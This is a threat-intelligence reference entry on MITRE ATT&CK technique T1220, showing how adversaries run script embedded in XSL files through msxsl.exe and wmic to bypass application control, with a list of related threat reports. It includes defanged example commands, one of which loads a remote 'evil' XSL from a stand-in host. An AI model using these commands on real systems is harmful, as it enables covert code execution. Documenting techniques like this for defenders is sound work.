Common Information
Type Value
Value
XSL Script Processing - T1220
Category Attack-Pattern
Type Mitre-Attack-Pattern
Misp Type Cluster
Description Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017) Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019) Command-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019) * <code>msxsl.exe customers[.]xml script[.]xsl</code> * <code>msxsl.exe script[.]xsl script[.]xsl</code> * <code>msxsl.exe script[.]jpeg script[.]jpeg</code> Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019) Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic) * Local File: <code>wmic process list /FORMAT:evil[.]xsl</code> * Remote File: <code>wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</code>
Details Published Attributes CTI Title
Details Website 2022-08-25 38 MORE_EGGS and Some LinkedIn Resumé Spearphishing
Details Website 2021-11-19 43 Corporate Loader "Emotet": History of "X" Project Return for Ransomware
Details Website 2021-07-10 106 Common Tools & Techniques Used By Threat Actors and Malware — Part I
Details Website 2021-02-17 16 탈륨 조직, 코로나19 관련 소상공인 지원 종합안내로 위장한 HWP 공격
Details Website 2021-02-12 22 InfoSec Handlers Diary Blog - SANS Internet Storm Center
Details Website 2021-01-03 4 탈륨 조직, 사설 주식 투자 메신저 악용해 소프트웨어 공급망 공격 수행
Details Website 2020-06-17 37 Operation In(ter)ception: Aerospace and military companies in the crosshairs of cyberspies | WeLiveSecurity
Details Website 2020-06-16 61 Cobalt: tactics and tools update
Details Website 2020-03-05 125 Guildma: The Devil drives electric | WeLiveSecurity
Details Website 2020-02-05 44 Pro-Russian CyberSpy Gamaredon Intensifies Ukrainian Security Targeting - SentinelLabs
Details Website 2019-08-01 53 From Carnaval to Cinco de Mayo – The journey of Amavaldo | WeLiveSecurity
Details Website 2019-07-08 18 Dismantling a fileless campaign: Microsoft Defender ATP's Antivirus exposes Astaroth attack - Microsoft Security Blog
Details Website 2019-03-14 20 MSXSL.EXE AND WMIC.EXE — A Way to Proxy Code Execution
Details Website 2019-02-13 4 The Newest Variant of the Astaroth Trojan Evades Detection in the Sneakiest Way
Details Website 2019-02-13 4 New Astaroth Trojan Variant Exploits Anti-Malware Software to Steal Info